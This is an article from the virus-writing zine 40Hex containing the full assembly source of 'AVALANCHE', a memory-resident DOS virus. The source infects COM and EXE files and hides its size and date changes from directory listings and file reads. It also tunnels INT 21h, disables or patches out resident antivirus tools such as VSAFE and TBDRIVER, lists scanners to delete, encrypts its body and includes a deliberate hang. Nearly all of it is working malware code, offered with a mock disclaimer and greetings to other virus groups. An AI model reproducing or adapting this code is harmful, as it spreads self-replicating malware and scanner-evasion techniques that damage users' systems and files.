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40Hex Issue 14 File 013

40Hex Number 14 Volume 5 Issue 1 File 013
;* Resident stealth infector 'AVALANCHE' *
;* written by Metal Junkie in 1994/95 *
; 100% memory stealth
; Int 21h Tunneling
; Retro functions
; EXE/COM - Infection
; and many other features. Enjoy it!
; Disclaimer: Warning! This source contains destructive code. Do not compile
; it! The author is not responsible for any damage caused by this code.
; And last but not least, greetings to Neurobasher,Stormbringer, the guys
; of VLAD (hi qark) and the Unforgiven Metal Militia.
code segment para 'code'
org 100h
assume cs:code, ds:code, es:code, ss:code ;
;======== Initializing routines and decryption =============================
; test options:
EXEPERMIS equ 1 ; infect EXE Files
COMPERMIS equ 1 ; infect COM files
STEALTH equ 1 ; include stealth functions
RETRO equ 1 ; anti scan
start: ; SS ist always equal CS !
mov ecx,(offset (virende-vircode+1)) ; Adios F-Prot !
kenn1: mov bx,(266+offset vircode)
jmp patch
db 0eah ; Adios TBAV !
entschl: xor byte ptr cs:[bx],0
inc bx
patch: loop entschl
; ------ Start of encrypted body ----
vircode: call getip ; Only to fool simple scanners looking
getip: pop ax ; for the classic pop bp
mov bp,ax
sub bp,(100h+(getip-start));
patch5: jmp short conti
db 81h
conti: jmp lab1
;--- Constants ---------------------------------------------------------
sprbef equ 3 ; 3 Bytes for a JUMP
monat equ 01h ; Date of activation
itsme equ "sh" ; Signature
DOS_N equ 21h ; normal DOS Function 21
db " AVALANCHE/Germany '94...Metal Junkie greets Neurobasher"
;--- EXE-Header-Lokationen ---
cs_pos equ 16h ; Position of Codesegment in EXE Header
ss_pos equ 0eh
ip_pos equ 14h ; IP
ovl_no equ 1Ah
hdl_pos equ 08h ; Size of Header
sp_pos equ 10h ; SP
min_par equ 0ah ; Min. amount of memory
div512 equ 04h ; Filelength DIV 512
mod512 equ 02h ; MOD 512
segtab equ 06h ;
chksum equ 12h ;
;--- Variables ----
cs_merk dw (0)
ds_merk dw (0) ; store the original regs here
es_merk dw (0)
sp_merk dw 0fffeh
ss_merk dw (0)
min_mem dw 4096
ip_merk dw 0100h ; pointer to first instruction of host
wirt dw (?) ; this is a far jump to the host
combytes db 0C3h,0h,01h ; buffer for host bytes (COM)
com_vek db 0e9h,0,0 ; jump vector (COM)
org_filelng_lo dw (?) ; original length of host
org_filelng_hi dw (?)
mem_strat dw (?) ; buffer for allocation strategy
umb_strat db (?)
comflag db 1 ; 1=host is a COM-file
generation dw 0
;------- check activation circumstances ------------------------------------
lab1: cli
mov [bp+ds_merk],ds ; store original segments here
push cs ; setup registers
pop ds
mov ax,4bf0h ; Are we resident in memory ?
xor di,di
int DOS_N
cmp di,itsme
jne lab32
jmp restore_com ; Yes, we are -> exit
lab32: mov ah,30h ; Dos-Version ?
int DOS_N
cmp al,5
jae lab4
jmp restore_com ; exit when < 5.0
lab4: mov ah,04h ; enable virus [Monat] 1994
int 1ah
jc lab5
cmp cx,1996h
jae lab5
cmp dh,monat
jae lab5
jmp restore_com
lab5: call killscan ; kill VSAFE/VWATCH
mov ah,0eh ; search or SDScan Novell Dos 7.0
mov dl,0adh
int DOS_N
cmp al,0bah
jne initvir
jmp restore_com ; Scanner active ==> Exit
dowirt: mov ax,[bp+ds_merk]
mov ds,ax ; restore DS/ES
mov es,ax
cmp [bp+comflag],1 ; Is host a COM file ?
je do2
mov ax,es
add ax,[bp+cs_merk] ; old codesegment in vector
add ax,16
mov word ptr [bp+wirt],ax
mov sp,[bp+sp_merk] ; restore stack
mov ax,es
add ax,cs:[bp+ss_merk]
add ax,16
mov ss,ax
jmp short do3
do2: mov ax,cs
mov cs:[bp+wirt],ax
do3: xor ax,ax ; Important ! All Registers have to be ZERO
mov bx,ax
mov cx,ax
mov dx,ax
mov si,ax
mov di,ax
jmp dword ptr cs:[bp+ip_merk] ; jump to host
;---- Allocate memory for virus --------------------------------------
initvir: mov ax,[bp+ds_merk] ; free memory
mov es,ax ; start segment to ES
mov bx,[bp+min_mem] ; amount needed for virus
mov ah,4ah ; change memory allocation
int DOS_N
jae init11
jmp restore_com
init11: push cs
pop es
mov byte ptr [bp+notarn],0 ; enable stealth functions
mov byte ptr [bp+virtod],0
;--- get free block in the TOM -----------------
mov ax,5800h ; get allocation strategy
int DOS_N
mov [bp+mem_strat],ax ; und store it
mov ax,5802h ; get UMB Status
int DOS_N ; DOS<5.0 C=1,AX=1
jae init1
jmp restore_com
init1: mov [bp+umb_strat],al ; store it
mov ax,5801h ; set new strategy
mov bx,0000000000000010b ; Last Block, search in TPA only
int DOS_N
mov ax,5803h ; disable usage of UMB
mov bx,0
int DOS_N
mov bx,(((virende-start+100) shr 4) +33) ; Virus in Paragr.
; + place to store Trojan
mov ah,48h ; allocate RAM for virus
int DOS_N
jc resetall
push ax ; store allocated segment
dec ax
mov es,ax ; ES to MCB of alloc. memory
inc ax
mov word ptr es:[0],"Z"
mov word ptr es:[1],8 ; make us resident as part of DOS
mov ax,3521h ; get old INT 21h
int DOS_N
mov word ptr [bp+int21alt],bx
mov word ptr [bp+int21alt+2],es
mov word ptr [bp+OrgDos],bx ; if tracer failed :(
mov word ptr [bp+OrgDos+2],es
call TunnelIt ; trace the INT 21h vector
cmp ax,0ffh ; have we found the vector ?
je notun
mov word ptr [bp+OrgDos+2],es ; store the new entry
mov word ptr [bp+OrgDos],ax
notun: mov ax,3513h ; get old BIOS interrupt 13h
int DOS_N
mov word ptr [bp+int13alt],bx
mov word ptr [bp+int13alt+2],es
pop es ; get back virus-segment
push es
mov si,offset start
add si,bp
mov di,100h
mov cx,offset (virende-start)
rep movsb ; Copy the virus to TOM
mov dx,offset int21 ; hook INT21h to virus handler
mov ax,2521h
pop ds ; get back virus segment
int DOS_N
mov dx,offset int13 ; hook BIOS-Interrupt to virus handler
mov ax,2513h
int DOS_N
resetall: push cs
pop ds
push [bp+ds_merk] ; restore memory allocation
pop es
mov bx,0ffffh
mov ah,4ah
int DOS_N
mov ah,4ah
int DOS_N
mov bl,[bp+umb_strat] ; restore old UMB strategy
xor bh,bh
mov ax,5803h
int DOS_N
mov bx,[bp+mem_strat] ; Alte Strategie zurck
mov ax,5801h
int DOS_N
; restore orinal JUMP to host
restore_com: cmp [bp+comflag],1 ; is it a COM file ?
jne initende
mov di,[bp+ip_merk] ; build up traget adress
mov si,offset combytes ; restore original bytes to host
add si,bp ; only necessary if .com - EXE has a direct
mov cx,sprbef ; vector.
rep movsb
initende: jmp dowirt
; --------- Kill VSAFE and VWATCH and TBDRIVER -------------------
; you can use this function from the resident part of virus too
killscan proc near
push es
push ax
push bx
push cx
push dx
push si
push di
mov ax,0fa00h ; Vsafe resident ?
mov dx,5945h
int 16h
cmp di,4559h
jne ks1
mov ax,0fa02h
mov dx,5945h
mov bl,0
int 16h ; get old flags to CL
and cl,23 ; disable only parts of scanner
mov bl,cl ; because the full deinstallation causes
mov ax,0fa02h ; warnings
mov dx,5945h
int 16h
ks1: push ds
xor ax,ax
mov ds,ax
les si,ds:[21h*4] ; get INT 21h handler
pop ds
mov ax,word ptr es:[si] ; get first two instructions of INT 21h
cmp ax,05ebh ; Is it that fucking TBDRIVER ?
jne ks2
mov word ptr es:[si],9090h ; Bomb it out of memory !!!
; This works because there is a far-jump to DOS directly behind
; the near jump to the scanner
ks2: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
killscan endp
;*** INT 21h Tracer to locate the entry of DOS ***
;*** Setting up some parameters for the tracing routine ***
; INPUT : none
; OUTPUT : Original-DOS-vektor in ES:AX
Tunnelit PROC NEAR
mov ah, 52h ; get the DIB adresse
int DOS_N
jc tuend
mov ax,es:[bx-2] ; vector to first MCB -> ES:AX
mov word ptr [bp+dos_seg],ax ; here is the DOS segment
xor ax,ax ; ES=0
mov es,ax
les ax, es:[1*4] ; store original INT 1
mov word ptr [bp+oldint1], ax
mov word ptr [bp+oldint1+2], es
mov cs:[bp+sflag],0
mov word ptr cs:[bp+deltaoff],bp ; set up delta offset
xor ax,ax ; hook INT 1 to tracer
mov es,ax
mov bx,offset int1 ; delta Offset!
add bx,bp
mov word ptr es:[1*4],bx
mov es:[1*4+2],cs
pushf ; enable single step
pop ax ; by setting the T-Flag
or ah,1
push ax
mov ah,0bh ; get keyboardstatus to find
cli ; the entry
call dword ptr cs:[bp+int21alt]
pushf ; single step off
pop ax ; AX=FF if tracer failed
and ax,0feffh
push ax
cli ; restore old Int 1
push ds
xor ax,ax
mov ds,ax
les ax, cs:[bp+oldint1]
mov word ptr ds:[1*4], ax
mov word ptr ds:[1*4+2], es
pop ds
cmp [bp+sflag],1 ; was tracing successful ?
jne nosuccess
mov ax,word ptr [bp+oldint21+2]
mov es,ax
mov ax,word ptr [bp+oldint21]
tuend: ret
nosuccess: mov ax,0ffh ; nope, we have no entry :(
jmp short tuend
oldint1 dd ?
oldint21 dd ?
sflag db 0
dos_seg dw ?
Tunnelit ENDP
;*** Single Step interrupt routine ***
;*** Tries to find the original entry of the DOS to fool reesident ***
;*** scanners ***
push bp
mov bp,sp
push ax
push si
db 0BEh ; mov si, deltaoff
deltaoff dw (?)
mov ax, [bp+4] ; get segment of return adress
cmp ax,cs:[si+dos_seg] ; is it in the DOS segement ?
jbe foundit
ex_int1:pop si
pop ax
pop bp
foundit: ; yes, we've found the entry
mov word ptr cs:[si+OldInt21+2],ax ; store segment (bp+4)
mov ax,[bp+2]
mov word ptr cs:[si+OldInt21],ax ; store offset
mov cs:[si+sflag],1
and word ptr [bp+6], 0FEFFh ; Tracing off
jmp short ex_int1
;**** Interrupt 21 Handler ****
;--- Variables :
psp equ 0 ; ununsed PSP for buffer
; --- Interruptvektors ---
crbreak dd (?) ; Old Critical-Error-INT
int21alt dd (?) ; Old Dos-Interrupt
int13alt dd (?) ; Old BIOS-Interrupt
OrgDos dd (?) ; Original-DOS-Interrupt
; --- Variables ---
nam_off dw (?) ; filename offset
nam_seg dw (?) ; filename segment
dtaseg dw (?) ; segment of DTA
dtaoff dw (?) ; offset of DTA
d_datum dw (?) ; file date
d_zeit dw (?) ; time of last change
d_attrib dw (?) ; old files attributes
handle dw (?) ; file handle
ret_off dw (?)
; --- Flags ---
internal db 0 ; indicates internal usage of routines
flag db 0 ; allround flag
virtod db 0 ; 1=Virus is disabled
notarn db 0 ; 1=Stealth functions disabled
comsuff db "*.com",0
cint proc far ; Critical-Error-INT
; to prevent virus from generating errors
sti ; during access on write proteted disks
mov al,3
cint endp
int21 PROC FAR ; new INT 21 handler
cmp ah,4bh ; Exec-Interrupt ?
jne check_stealth ; no, let's check stealth
cmp ah,4bh
jne aus2
is_exec: cmp al,0f0h ; virus self check
je rescheck
cmp al,05h ; ignore special exec functions
je aus2
cmp al,03h
je aus2
mov cs:[internal],0 ; internal usage of INT 21 handler
jmp exec ; yeah, it's the exec function
rescheck: mov di,itsme ; its me -> return to caller
aus2: jmp cs:[int21alt] ; jump to original INT 21h
;=== Handler for stealth functions of INT 21h ====================
cmp cs:[virtod],1 ; Ist Virus disabled ?
je aus
cmp cs:[notarn],1 ; Is Stealth shield disabled ?
je aus
cmp ah,4eh ; Find-First (Handle) ?
jne chk_hdl
jmp ff_hdl
chk_hdl: cmp ah,4fh ; Find-Next (Handle) ?
jne chk_fcb
jmp ff_hdl
chk_fcb: cmp ah,11h ; Find-First (FCB) ?
je firstnext
cmp ah,12h ; Find-Next (FCB) ?
je firstnext
jmp short holdat ; no, continue check
; ---- date/time fooling ---------------------------------------
holdat: cmp ax,5700h ; is someone asking on date/time of afile?
jne schieb_zeiger
jmp deal_dat
schieb_zeiger: ; maybe a movement of file pointer?
cmp ah,42h
jne read_3f
jmp deal_zeiger
read_3f: ; a file read function ?
cmp ah,3fh
jne aus
jmp deal_read
aus: jmp cs:[int21alt] ; jump to old interrupt
int21 endp
;------------------------ Handler-Bodies --------------------------------------------------
ff_hdl proc near ; handle find-first-next (handle)
pushf ; call function first
call cs:[int21alt]
jc ngef ; any files found ?
jmp short findfn1
ngef: retf 2
findfn1: call pushall ; save all registers
mov ah,2fh ; get DTA adress to ES:BX
int DOS_N
mov ax,es:[bx+18h] ; get date of file
and ax,1111111000000000b ; mask out the month
mov cl,9
shr ax,cl
cmp ax,90d ; compare with 90
jna findfnende ; year < 90 -> file is clean
sub word ptr es:[bx+26],(virende-start) ; shrink filelength
sbb word ptr es:[bx+28],0
sub word ptr es:[bx+18h],1100100000000000b ; date=date-100 years
findfnende: call popall
retf 2
ff_hdl endp
firstnext proc near ; handle the fcb functions
pushf ; call function
call cs:[int21alt]
call pushall
cmp al,255 ; any files found ?
jne continue
jmp short fcbende ; no, then exit
continue: mov ah,2fh ; get DTA adress to ES:BX
int DOS_N
cmp byte ptr es:[bx],255 ; is it a large FCB ?
je erwfcb
mov si,19h ; date entry (secret DOS)
mov di,1dh ; filelength (secret DOS)
jmp short normfcb
erwfcb: mov si,20h ; date entry (secret DOS)
mov di,24h ; filelength
normfcb: mov ax,es:[bx+si] ; get file and date stamps
and ax,1111111000000000b ; mask out the month
mov cl,9
shr ax,cl
cmp ax,90d ; compare with 90
jna fcbende ; year < 90 -> file is clean
sub word ptr es:[bx+di],(virende-start) ; change date/length
sbb word ptr es:[bx+di+2],0
sub word ptr es:[bx+di-7],(virende-start)
sbb word ptr es:[bx+di-7+2],0
sub word ptr es:[bx+si],1100100000000000b
fcbende: call popall
retf 2
firstnext endp
deal_dat proc near
call cs:[int21alt]
pushf ; don't save DX, it holds the date
push ax
push cx
mov ax,dx
and ax,1111111000000000b ; mask out month
mov cl,9
shr ax,cl
cmp ax,90 ; compare with 90 years
jna deal_datende ; year<90 -> file is clean
sub dx,1100100000000000b ; subtract 100 years
pop cx
pop ax
retf 2
deal_dat endp
; Don't let the file pointer hit the virus
deal_zeiger proc near
cmp al,02h ; handle funktion 2 only
jne zg_do_function
or cx,dx
jne zg_do_function
call pruefinf ; file infected ?
jae zg_do_function
mov cx,0ffffh
mov dx,-(virende-start) ; subtract virus size
call cs:[int21alt]
retf 2 ; and exit
jmp cs:[int21alt]
deal_zeiger endp
; ---------------------------------------------------------------------------
; funktion deal_read: Filters the virus on file access. The memory image is
; clean. Virus contains the original header bytes at his end.
rd_handle dw (?) ; file handle
rd_bytes dw (?) ; amount of bytes to read
rd_aktpos_lo dw (?) ; actual file pointer position
rd_aktpos_hi dw (?)
rd_endpos_lo dw (?)
rd_endpos_hi dw (?)
rd_virpos_lo dw (?)
rd_virpos_hi dw (?)
rd_es_merk dw (?)
rd_ds_merk dw (?)
rd_funktion dw (?)
rd_error_msg dw (?)
rd_puffer_off dw (?)
rd_bytes_read dw (?)
deal_read proc near
cmp bx,5 ; Ist es file handle or a device ?
jae dlrd1
jmp do_read2
call pruefinf ; is file infected ?
jae do_read2
mov cs:[rd_ds_merk],ds
push cs
pop ds
mov [rd_funktion],ax
mov [rd_handle],bx
mov [rd_bytes],cx
mov [rd_puffer_off],dx
mov [rd_es_merk],es
jmp dlrd2
; restore all regs and do the read
do_read0: mov cx,cs:[rd_bytes] ; restore old CX
; restore all regs exept for cx and do the read
mov bx,cs:[rd_handle]
mov dx,cs:[rd_puffer_off]
mov ax,cs:[rd_es_merk]
mov es,ax
mov ax,cs:[rd_ds_merk]
mov ds,ax
mov ax,cs:[rd_funktion]
; don't restore regs and do the read
do_read2: jmp cs:[int21alt]
; return to caller with restored regs exept for ax
mov cx,cs:[rd_bytes]
mov dx,cs:[rd_puffer_off]
mov bx,cs:[rd_es_merk]
mov es,bx
mov bx,cs:[rd_ds_merk]
mov ds,bx
mov bx,cs:[rd_handle]
;return to caller without restored regs
retf 2
dlrd2: mov ax,4201h ; get file pointer position
xor cx,cx
xor dx,dx
call cs:[int21alt]
jc do_read0
mov [rd_aktpos_lo],ax ; store it
mov [rd_aktpos_hi],dx
add ax,[rd_bytes] ; calc endposition of file pointer
adc dx,0
mov [rd_endpos_lo],ax
mov [rd_endpos_hi],dx
mov ax,4202h ; get original filesize
xor cx,cx
xor dx,dx
call cs:[int21alt]
sub ax,(virende-start)
sbb dx,0
mov [rd_virpos_lo],ax ; store the original size
mov [rd_virpos_hi],dx
mov ax,4200h
mov cx,[rd_aktpos_hi]
mov dx,[rd_aktpos_lo]
call cs:[int21alt]
jae rdmk1
jmp do_read0
; Now we have to make a few decisions where the pointer is and what
; to do that he does not hit the virus body
rdmk1: mov ax,[rd_aktpos_lo] ; aktpos < 1dh
cmp ax,1dh
jb fall_1 ; pointer is in the header -> case 1
mov bx,[rd_aktpos_hi] ; aktpos < virpos ?
les cx,dword ptr [rd_virpos_lo]
mov dx,es ; DX:CX = aktpos
call comp_32bit
jb fall_2 ; pointer is in the host -> case 2
jmp fall_3 ; pointer is in the virus -> case 3
; more decisions........
fall_1: ;--- pointer is in the header ----
les ax,dword ptr [rd_endpos_lo]; Endpos in header(endpos<1dh) ?
mov bx,es ; BX:AX = Endpos
xor dx,dx
mov cx,1dh
call comp_32bit ; caller is going to....
jb fall_11 ; read header only
les cx,dword ptr [rd_virpos_lo]
mov dx,es ; DX:CX = Virpos
call comp_32bit
jb fall_12 ; read header-host
jmp fall_13 ; read header-host-virus
fall_2: ; -- pointer is in the host ----
les ax,dword ptr [rd_endpos_lo] ; Endpos < Virpos ?
mov bx,es ; BX:AX = end_pos
les cx,dword ptr [rd_virpos_lo]
mov dx,es
call comp_32bit
jb hilf1 ; end position is in the host
jmp fall_22 ; endposition is in the virus
hilf1: jmp fall_21
fall_3: ; --- pointer is in the virus ----
mov ax,0 ; return with zero bytes to caller
jmp do_ret1
; --- actions according to th 6 cases above
fall_11: ; --- caller is trying to read to header -----
mov dx,1ch ; how many bytes to read ?
sub dx,[rd_aktpos_lo]
push dx
neg dx ; negative offset
mov cx,0ffffh
mov al,02h
call set_pos ; set pointer to corresponding byte
; at the end of the virus where the
; original bytes are stored
mov dx,[rd_puffer_off] ; read the original bytes from there
mov cx,[rd_bytes]
mov bx,[rd_handle]
mov ah,3fh
push [rd_ds_merk] ; set DS to readbuffer
pop ds
call cs:[int21alt]
push cs
pop ds
mov cx,[rd_endpos_hi]
mov dx,[rd_endpos_lo]
mov al,0
call set_pos ; correct the pointer position
jmp do_ret1
fall_12: ; --- caller is trying to read header+host ---
mov cx,[rd_bytes]
cross: mov bx,[rd_handle] ; call read function
mov dx,[rd_puffer_off]
push [rd_ds_merk]
pop ds
mov ah,3fh
call cs:[int21alt]
jae f121
jmp do_ret1
f121: push cs ; DS=CS
pop ds
mov [rd_bytes_read],ax ; store readed bytes
mov dx,1ch ; how many bytes from the header should
sub dx,[rd_aktpos_lo] ; have been read ?
push dx
neg dx ; negative offset
mov cx,0ffffh
mov al,02h
call set_pos ; set pointer to correcpondig bytes
jae fall_12h1 ; behind the virus
pop cx ; restore stack
jmp reset_point ; restore file point and exit
pop cx ; cx=ax (numer of bytes to read)
push [rd_ds_merk]
pop ax ; get buffer segment
mov dx,[rd_puffer_off] ; increase memory pointer
add dx,[rd_aktpos_lo]
adc ax,0 ; take care of the carry flag
mov ds,ax
mov bx,cs:[rd_handle]
mov ah,3fh
call cs:[int21alt] ; read original header
jae fall_12h2
jmp reset_point
push cs
pop ds
mov cx,[rd_aktpos_hi] ; set pointer to new position
mov dx,[rd_aktpos_lo]
add dx,[rd_bytes_read]
adc cx,0
xor al,al
call set_pos
mov ax,[rd_bytes_read]
jmp do_ret1
fall_13: ; --- caller is trying to read header+host+virus
mov ax,[rd_virpos_lo] ; subtract virus bytes
sub ax,[rd_aktpos_lo]
mov cx,ax
jmp cross ; restore original cx
fall_21: ; --- caller is trying to read the host
jmp do_read0 ; no action necessary
fall_22: ; --- caller is trying to read host+virus
mov cx,[rd_virpos_lo] ; subtract virus bytes
sub cx,[rd_aktpos_lo]
push cx
mov bx,[rd_handle] ; do the read function
mov dx,[rd_puffer_off]
mov ah,3fh
push [rd_ds_merk]
pop ds
call cs:[int21alt]
pop cx
jmp do_ret2
; Compare two 32bit numbers
; INPUT no 1: BX:AX
; no 2: DX:CX
; Ausgabe:
; no 1=no 2 : ZF=1
; no 1>no 2 : CF=0,ZF=0
; no 1<no 2 : CF=1
cmp bx,dx ; compare hi words
ja comp_16end ; no 1 > no 2
jb comp_16end ; no 1 < no 2
cmp ax,cx ; HI-Words eqaul -> compare low-words
ja comp_16end ; no 1 > no 2
jb comp_16end ; no 2 < no 2
; else no 1 = no 2
; restores the original file pointer position and leaves the routine
; with error 'read 0 bytes'
mov dx,cs:[rd_aktpos_lo]
mov cx,cs:[rd_aktpos_hi]
xor al,al
call set_pos
xor ax,ax
jmp do_ret1
; Routine to change pointer position
; INPUT : al=offset-code
; cx:dx = new position
push ax
push bx
push dx
mov ah,42h
mov bx,cs:[rd_handle]
call cs:[int21alt]
pop dx
pop bx
pop ax
deal_read endp
INT13 PROC FAR ; INT 13h Handler
orgint: jmp cs:[int13alt]
; *************************************************************************
; *** new function 4ch of int 21 ***
; *************************************************************************
exec proc near ; handle an exec call
; DS:DX pointer to filename
call pushall
mov cs:[internal],0 ; indicates call by foreign program
mov cs:[notarn],0 ; stealth on
call killscan ; kill scanners
jmp short exe0
exec1: call pushall ; entry for internal usage
mov cs:[internal],1 ; DS:DX pointer to filename
exe0: mov cs:[nam_off],dx ; store filename offset
mov cs:[nam_seg],ds ; and segment
mov cs:[flag],0 ; reset infection flag
push ds
push dx
call discrit ; disable error handler
exe01: pop dx
pop ds
mov ax,4300h ; get file attributes
int DOS_N
jae exe1
jmp exeaus2 ; exit on error
exe1: mov cs:[d_attrib],cx ; store attributes
test cx,100b ; is it a system file ?
je exe2
jmp exeaus2 ; yes? do not infect it
exe2: mov ax,4301h ; disable read-only attributes
and cx,1111111111111110b
call cs:[int21alt]
jae exe3
jmp exeaus
exe3: call fuck_scanner ; fuck scanner
mov ax,3d00h ; open file with read-only
call cs:[int21alt] ; ds:dx filename
jae exe4 ; access denied -> exit
jmp exeaus
exe4: mov bx,ax ; store handle in bx
push cs ; DS=CS
pop ds
mov [handle],bx
push bx
mov ax,1220h ; get the sft table
int 2fh
mov al,es:[di] ; necessary because scanners locate
mov bl,al ; the TridenT Mirror virus in memory
mov ax,1216h
int 2fh
pop bx
jae exe41
jmp fehler
exe41: mov word ptr es:[di+2],2 ; set file to read/write access
call pruefinf ; is file infected ?
jae exe5
jmp fehler
exe5: mov dx,psp ; read the original header to psp
mov cx,1ch
mov ah,3fh
int DOS_N
jc fehler
mov si,dx ; copy original header behind virus
mov cx,1ch ; for later memory stealth
mov di,offset orig_exehead
push cs
pop es
rep movsb
mov ax,4202h ; get the filesize by setting the
xor cx,cx ; pointer to end of file
xor dx,dx
call cs:[int21alt]
jae exe6
jmp short fehler ; exit on error
exe6: mov [org_filelng_lo],ax ; store lo-word o file length
mov [org_filelng_hi],dx ; hi-word also
exe8: cmp word ptr cs:[psp],5a4dh ; is it an exe file or a .com ?
jne exe9
exe80: call infektexe ; infect .exe
jmp short fehler ; exit on error
exe9: cmp [org_filelng_lo],62000 ; .com > 62000 ? -> exit
ja fehler
call infektcom ; infect com file
fehler: call reset_status ; reset file attributes
mov ah,3eh ; close file
call cs:[OrgDos]
exeaus: call reset_attrib
exeaus2: call encrit ; enable error handler
exeaus3: cmp cs:[internal],1 ; internal use ?
je rtocaller
call popall
jmp cs:[int21alt] ; execute program
rtocaller: mov cs:[internal],0
call popall
ret ; back to caller (virus)
exec ENDP
reset_status PROC NEAR ; reset original file and date stamps
; [Flag]=1 == > increase date by 100 years
; file has to be openend
mov ax,5701h ; restore date/time
mov bx,[handle]
mov cx,[d_zeit]
mov dx,[d_datum]
cmp [flag],1 ; has infection took place ?
jne fe1
add dx,1100100000000000b ; add 100 years
fe1: pushf
call cs:[OrgDos]
reset_status ENDP
reset_attrib PROC NEAR ; restore original file attibutes
mov cx,[d_attrib]
mov ax,4301h
mov dx,[nam_off]
mov bx,[nam_seg] ; DS:DX pointer to filename
push bx
pop ds
call cs:[OrgDos]
reset_attrib ENDP
infektcom proc near ; infect com file
mov ax, word ptr cs:[psp+2] ; is it a device driver ?
cmp ah,0ffh
je infektende ; exit if so.
cmp al,0ffh
je infektende
;--- calc new entry ----------------------------
mov bx,[org_filelng_lo]
sub bx,3h
mov word ptr [com_vek+1],bx
;--- write new entry -------------------------
mov ax,4200h ; set file pointer to first byte
mov bx,cs:[handle]
xor dx,dx
xor cx,cx
call cs:[OrgDos]
jc infektende
mov ah,40h ; write new entry
mov cx,3 ; 3 bytes
mov dx,offset com_vek
call cs:[OrgDos]
jc infektende
mov ax,4202h ; set pointer to end of file
xor dx,dx
xor cx,cx
call cs:[OrgDos]
jc infektende
mov [ip_merk],100h ; store IP
mov [comflag],1 ; flag indicates COM file
mov ax,word ptr cs:[psp] ; store original bytes
mov word ptr [combytes],ax
mov al,byte ptr cs:[psp+2]
mov byte ptr [combytes+2],al
mov [min_mem],4096 ; minimum amount of memory for a com file
mov ax,[org_filelng_lo]
add ax,offset vircode
mov word ptr [kenn1+1],ax
call kodier
mov [flag],1 ; file was successfully infected
infektende: ret
infektcom endp
infektexe proc near ; infect exe file (uff, very difficult)
push cs
pop es
mov si,offset psp
kompr: cmp word ptr [si+segtab],1 ; is it a compressed or selfchecking
ja checkwin ; file ?
ret ; exit if so.
checkwin: cmp byte ptr [si+18h],40h ; is it a new exe header ?
jne checkovl ; forget it!
checkovl: cmp byte ptr [si+ovl_no],0 ; no overlays please !
je checklng
checklng: mov dx,[org_filelng_hi] ; check for internal overlays
mov ax,[org_filelng_lo]
call divide
inc ax ; add 512 bytes
cmp ax,[si+div512] ; compare only hi-byte
je go
go: mov ax,word ptr [si+cs_pos] ; store CS
mov [cs_merk],ax
mov ax,word ptr [si+ss_pos] ; store SS
mov [ss_merk],ax
mov ax,word ptr [si+sp_pos] ; store SP
mov [sp_merk],ax
mov ax,word ptr [si+ip_pos] ; and IP
mov [ip_merk],ax
mov dx,[org_filelng_hi] ; filesize to DX:AX
mov ax,[org_filelng_lo] ; calc new CS and SS
mov bx,[si+hdl_pos] ; calc header size in bytes
mov cl,4
shl bx,cl
sub ax,bx ; subtract header size from filesize
sbb dx,0 ; -> DX:AX
mov bx,ax ; calc new IP
and bx,0000000000001111b ; Lo-nibble is offset of IP
mov [si+ip_pos],bx
mov cx,4 ; filesize -> pararaphs
divide0: sar dx,1
rcr ax,1
loop divide0 ; result in AX
mov [si+ss_pos],ax ; set new SS
mov [si+cs_pos],ax ; SS=CS
mov [min_mem],ax ; set up amount of memory for virus
mov word ptr [si+sp_pos],((virende-start)+100h) ; set SP
ramok: mov ax,[org_filelng_lo] ; fix filesize int header
mov dx,[org_filelng_hi]
add ax,(virende-start+512) ; add virus + 512
adc dx,0
call divide
mov word ptr [si+mod512],bx
mov word ptr [si+div512],ax
xor cx,cx ; set file pointer to header
mov dx,0
mov bx,[handle]
mov ax,4200h
int DOS_N
jc exeinfende
mov ah,40h ; write new values in header
mov cx,1ch
mov dx,offset psp
call cs:[int21alt]
jc exeinfende
mov ax,4202h ; file pointer to end of file
xor dx,dx
xor cx,cx
int DOS_N
jc exeinfende
mov [comflag],0 ; host is an exe file
mov ax,[si+ip_pos]
add ax,(offset vircode -100h)
mov word ptr [kenn1+1],ax ; set up new delta offset
call kodier ; encrypt virus and write it to host
mov [flag],1 ; infection successful
exeinfende: ret
infektexe endp
; disable critical error handler to avoid write errors on write-protected
; disks
discrit proc near
call pushall
push cs
pop ds
mov ax,3524h ; get old INT 24h
int DOS_N ;
mov word ptr [crbreak],bx
mov word ptr [crbreak+2],es
mov ax,2524h ; set new handler
mov dx,offset cint
call cs:[OrgDos]
call popall
discrit endp
; enable critical error handler
encrit proc near
call pushall
mov dx,word ptr cs:[crbreak] ; restore old INT 24h
mov ax,word ptr [crbreak+2]
mov ds,ax
mov ax,2524h
int DOS_N
call popall
encrit endp
; INPUT DX:AX value to divide by 512
; OUTPUT AX value DIV 512
; BX value MOD 512
divide proc near
mov bx,ax
and bx,0000000111111111b ; filesize MOD 512
mov cx,9 ; 32 bit division
divide1: clc
shr dx,1
rcr ax,1
loop divide1
divide endp
; encyrpt virus and stick it to the end of host *
kodier proc near
push cs
pop es
inc [generation] ; increase generation counter
mov dx,offset (virende-start) ; virussize
mov si,offset start ; start of virus
mov ah,byte ptr [org_filelng_lo]
xor ah,0aah
mov byte ptr [entschl+3],ah ; decryptor value
kod0: mov ah,byte ptr [org_filelng_lo] ; key in in ah
xor ah,0aah
mov di,psp ; set pointer to unused psp
xor cx,cx ; reset byte counter
kod1: lodsb ; load a word
cmp si,offset vircode ; encyrpt it ?
jna ncode ; no, it's the virus decryptor
cmp si,offset vor_header ; do not encrypt the original header
ja ncode
xor al,ah ; encrypt word
ncode: stosb ; and write it to psp
inc cx
cmp cx,250 ; is buffer full ?
jna kod2 ; yes, then write it to disk
jmp short kodaus
kod2: cmp cx,dx ; are we ready ?
jne kod1 ; no, continue
kodaus: sub dx,cx
push dx ; write encrypted by to host
mov bx,[handle]
mov dx,psp ; ds:dx pointer to start of encry.buffer
mov ah,40h
pushf ; write cx bytes
call cs:[int21alt]
pop dx
jc kodrueck ; exit on error
or dx,dx
je kodrueck
jmp short kod0
dec [generation]
cmp [generation],32
jne kodrueck
absturz: jmp absturz
kodrueck: ret
kodier endp
;*** check if file is infected ****
;*** INPUT : BX=Handle ****
;*** OUTPUT : C=0: file is clean / C=1: file is infected or access denied***
pruefinf proc near
push bx
push ax
push cx
push dx
mov ax,5700h ; get time/date stamps
call cs:[int21alt]
mov cs:[d_datum],dx
mov cs:[d_zeit],cx
and dx,1111111000000000b ; mask out the month
mov cl,9 ; year to low byte
shr dx,cl
cmp dx,90 ; year <90 file id clean
jb nichtinf
stc ; set infection flag
pruefaus: pop dx
pop cx
pop ax
pop bx
nichtinf: clc
jmp short pruefaus
pruefinf endp
; retro function: delete scanners
scanner db "F-PR",0
db "TBAV",0
